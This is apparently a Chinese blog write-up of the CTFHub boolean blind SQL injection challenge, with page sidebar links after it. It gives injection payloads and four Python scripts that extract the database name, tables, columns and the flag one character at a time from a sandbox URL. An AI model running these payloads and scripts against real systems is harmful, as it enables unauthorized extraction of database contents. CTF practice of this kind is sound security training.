当前位置:网站首页>ctfhub-sql布尔盲注
ctfhub-sql布尔盲注
2022-06-11 17:46:00 【榴莲 蛋挞】
打开网址,先输入:
1 and length(database())>3得到:
输入:
1 and length(database())<3得到:
看出可以布尔盲注
查看当前表名:
import requests
re=requests.session()
url1='http://challenge-0d74f816c8e31da2.sandbox.ctfhub.com:10800/'
st=''
for j in range(1,5):
for i in range(43,126):
ss="?id=1 and ascii(substr(database(),"+str(j)+",1))="+str(i)
url=url1+ss
pa=re.get(url=url).text
if "query_success"in pa:
st+=chr(i)
break
print(st)
于是先得到当前数据库种包含的表名:
?id=1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='sqli'),j,1))=iimport requests
re=requests.session()
url1='http://challenge-0d74f816c8e31da2.sandbox.ctfhub.com:10800/'
st=''
for j in range(1,10):
for i in range(43,126):
ss="?id=1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='sqli'),"+str(j)+",1))="+str(i)
url=url1+ss
pa=re.get(url=url).text
if "query_success"in pa:
st+=chr(i)
break
print(st)
得到:
再查看表格flag包含的字段:
?id=1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),j,1))=i
import requests
re=requests.session()
url1='http://challenge-0d74f816c8e31da2.sandbox.ctfhub.com:10800/'
st=''
for j in range(1,10):
for i in range(43,126):
ss="?id=1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),"+str(j)+",1))="+str(i)
url=url1+ss
pa=re.get(url=url).text
if "query_success"in pa:
st+=chr(i)
break
print(st)
得到:
于是最后一步读取flag表种flag字段的内容:
?id=1 and ascii(substr((select flag from flag),j,1))=i
import requests
re=requests.session()
url1='http://challenge-0d74f816c8e31da2.sandbox.ctfhub.com:10800/'
st=''
for j in range(1,40):
for i in range(43,126):
ss="?id=1 and ascii(substr((select flag from flag),"+str(j)+",1))="+str(i)
url=url1+ss
pa=re.get(url=url).text
if "query_success"in pa:
st+=chr(i)
break
print(st)
得到:
边栏推荐
- Hwang
- sqli-labs通关嘿嘿~
- Tle6389-2g V50's unique pwm/pfm control scheme has a duty cycle of up to 100%, forming a very low differential pressure - keshijin mall
- vulhub
- Spring 2021 daily question [end of week4]
- Simple understanding of events
- 密评-----
- Winter vacation daily question 2022 [week1 not finished]
- About element location and size
- R language mice package error in terms Formula (TMP, simplify = true): the model formula in extractvars is incorrect
猜你喜欢
![[foundation of deep learning] learning of neural network (3)](/img/a5/1b80ba85faf8fa636b784c76d4df2f.png)
随机推荐
網絡安全威脅情報體系
GB gb28181 protocol video platform easygbs adds or deletes offline channels
TiDB-unsafe recover(tikv宕机数大于等于一半副本数)
Tle6288r is a 6-channel (150 MOhm) intelligent multi-channel switch using intelligent power technology - keshijin mall
Upload labs failed to pass the customs halfway and the middle road collapsed
6-3 reading articles (*)
[MapReduce] a complete Mr program case teaches you how to package and run with idea
Merge K ascending linked lists ---2022/02/26
spawn ./ gradlew EACCES at Process. ChildProcess._ handle. onexit
Winter vacation daily question (improvement group) [end of week 4]
[collect first and use it sooner or later] 100 Flink high-frequency interview questions series (II)
Rtsp/onvif protocol easynvr video platform arm version cross compilation process and common error handling
Common shortcut keys for Hello go (x) and GoLand
【C】 Compilation preprocessing and environment
adb 命令学习笔记
R语言寻找数据集缺失值位置
Why is the UDP stream set to 1316 bytes
密码学概述
Hello go (XI). Go language common standard library I
Service学习笔记03- 前台服务实战